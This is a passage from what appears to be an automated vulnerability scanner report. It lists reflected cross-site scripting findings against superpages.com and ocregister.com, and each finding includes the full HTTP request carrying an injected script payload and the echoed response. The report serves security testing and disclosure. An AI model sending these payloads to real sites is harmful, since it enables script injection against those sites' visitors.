SP_SearchManager._ApplyResults(1,0,[new SP_SearchResult('2201547790','Rittenhouse Square - M&T Bank','117 S 18th St, Philadelphia, PA 19103','(215) 665-1509','std','yp',39.950997, -75.170329,null,null,null,'US',true,0.8,false,null,null,'','',false,'www.mtb.com','http://clicks.superpages.com/ct/clickThrough?SRC=MapBased&target=SP&PN=1&FP=map5bf14\\';alert(1)//32bd7f650df&C=banks&PGID=yp257.8083.1296759515356.165406242&TS=nbt&ACTION=log,red&LID=2201547790&TR=77&bidType=FLCLIK&relativePosition=0&position=0&PGSN=E0&RS=96&FL=url&TL=off&LOC=http://www.tomtracker.com/redire
...[SNIP]...

1.207. http://mapserver.superpages.com/mapbasedsearch/spSearchProxyLight [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/spSearchProxyLight

Issue detail

The value of the a request parameter is copied into the HTML document as plain text between tags. The payload f2f57<script>alert(1)</script>151fa128c48 was submitted in the a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mapbasedsearch/spSearchProxyLight?app=sp&sw=1&i=1&a=banksf2f57<script>alert(1)</script>151fa128c48&c=39.954484&d=-75.182068&r=1.010325&ppc=1&pi=0&FP=map&cpc=true&SRC=MapBased HTTP/1.1
Host: mapserver.superpages.com
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7%22-alert(1)-%22e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8A6B3D73FBEBC1BA5FD4B23D5F55C05E; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; SPC=1296748823650-www.superpages.com-30323935-794472; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; __unam=c5114f2-12dec4b1cc4-7f15d273-1; web=; shopping=; yp=; s_lastvisit=1296751078074; s_cc=true; s.campaign=comlocal1a; s_pv=Maps; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D; s_ppv=100

Response

HTTP/1.1 200 OK
Server: Unspecified
Content-Length: 637
Date: Thu, 03 Feb 2011 18:57:38 GMT

SP_SearchManager._ApplyResults(1,0,[],[],false,"<div class=message>No 'banksf2f57<script>alert(1)</script>151fa128c48' found on this map.<br><br><div class=solution>Try these solutions<br><br><span cl
...[SNIP]...

1.208. http://mortgage.ocregister.com/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81705"><script>alert(1)</script>5be155ad2e1 was submitted in the cat parameter. This input was echoed as 81705\"><script>alert(1)</script>5be155ad2e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?cat=81705"><script>alert(1)</script>5be155ad2e1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/?cat=81705\"><script>alert(1)</script>5be155ad2e1feed/" />
...[SNIP]...

1.209. http://mortgage.ocregister.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9060"><script>alert(1)</script>27ab659d801 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9060\"><script>alert(1)</script>27ab659d801 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d9060"><script>alert(1)</script>27ab659d801=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/?d9060\"><script>alert(1)</script>27ab659d801=1feed/" />
...[SNIP]...

1.210. http://mortgage.ocregister.com/2007/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/02/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52dcb"><script>alert(1)</script>39ced908d26 was submitted in the REST URL parameter 1. This input was echoed as 52dcb\"><script>alert(1)</script>39ced908d26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200752dcb"><script>alert(1)</script>39ced908d26/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200752dcb\"><script>alert(1)</script>39ced908d26/02/feed/" />
...[SNIP]...

1.211. http://mortgage.ocregister.com/2007/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/02/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b0a6"><script>alert(1)</script>92197aa8e9d was submitted in the REST URL parameter 2. This input was echoed as 6b0a6\"><script>alert(1)</script>92197aa8e9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/026b0a6"><script>alert(1)</script>92197aa8e9d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:15:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:06 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/026b0a6\"><script>alert(1)</script>92197aa8e9d/feed/" />
...[SNIP]...

1.212. http://mortgage.ocregister.com/2007/02/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3653d"><script>alert(1)</script>5061bfdeb82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3653d\"><script>alert(1)</script>5061bfdeb82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/02/?3653d"><script>alert(1)</script>5061bfdeb82=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/02/?3653d\"><script>alert(1)</script>5061bfdeb82=1feed/" />
...[SNIP]...

1.213. http://mortgage.ocregister.com/2007/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/03/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b96d6"><script>alert(1)</script>608b7c95f14 was submitted in the REST URL parameter 1. This input was echoed as b96d6\"><script>alert(1)</script>608b7c95f14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007b96d6"><script>alert(1)</script>608b7c95f14/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007b96d6\"><script>alert(1)</script>608b7c95f14/03/feed/" />
...[SNIP]...

1.214. http://mortgage.ocregister.com/2007/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/03/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 832cb"><script>alert(1)</script>2b5aea2aeb2 was submitted in the REST URL parameter 2. This input was echoed as 832cb\"><script>alert(1)</script>2b5aea2aeb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/03832cb"><script>alert(1)</script>2b5aea2aeb2/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/03832cb\"><script>alert(1)</script>2b5aea2aeb2/feed/" />
...[SNIP]...

1.215. http://mortgage.ocregister.com/2007/03/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/03/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10aad"><script>alert(1)</script>8ad5229eab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10aad\"><script>alert(1)</script>8ad5229eab7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/03/?10aad"><script>alert(1)</script>8ad5229eab7=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/03/?10aad\"><script>alert(1)</script>8ad5229eab7=1feed/" />
...[SNIP]...

1.216. http://mortgage.ocregister.com/2007/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/04/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55996"><script>alert(1)</script>f21c39f9bf3 was submitted in the REST URL parameter 1. This input was echoed as 55996\"><script>alert(1)</script>f21c39f9bf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200755996"><script>alert(1)</script>f21c39f9bf3/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200755996\"><script>alert(1)</script>f21c39f9bf3/04/feed/" />
...[SNIP]...

1.217. http://mortgage.ocregister.com/2007/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/04/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96ffb"><script>alert(1)</script>43052a33670 was submitted in the REST URL parameter 2. This input was echoed as 96ffb\"><script>alert(1)</script>43052a33670 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/0496ffb"><script>alert(1)</script>43052a33670/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/0496ffb\"><script>alert(1)</script>43052a33670/feed/" />
...[SNIP]...

1.218. http://mortgage.ocregister.com/2007/04/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74dd0"><script>alert(1)</script>2eca39d79aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74dd0\"><script>alert(1)</script>2eca39d79aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/04/?74dd0"><script>alert(1)</script>2eca39d79aa=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/04/?74dd0\"><script>alert(1)</script>2eca39d79aa=1feed/" />
...[SNIP]...

1.219. http://mortgage.ocregister.com/2007/05/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/05/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a5d1"><script>alert(1)</script>84bac8fb2df was submitted in the REST URL parameter 1. This input was echoed as 7a5d1\"><script>alert(1)</script>84bac8fb2df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20077a5d1"><script>alert(1)</script>84bac8fb2df/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20077a5d1\"><script>alert(1)</script>84bac8fb2df/05/feed/" />
...[SNIP]...

1.220. http://mortgage.ocregister.com/2007/05/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/05/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5186"><script>alert(1)</script>5f95e6db221 was submitted in the REST URL parameter 2. This input was echoed as e5186\"><script>alert(1)</script>5f95e6db221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/05e5186"><script>alert(1)</script>5f95e6db221/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:15:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
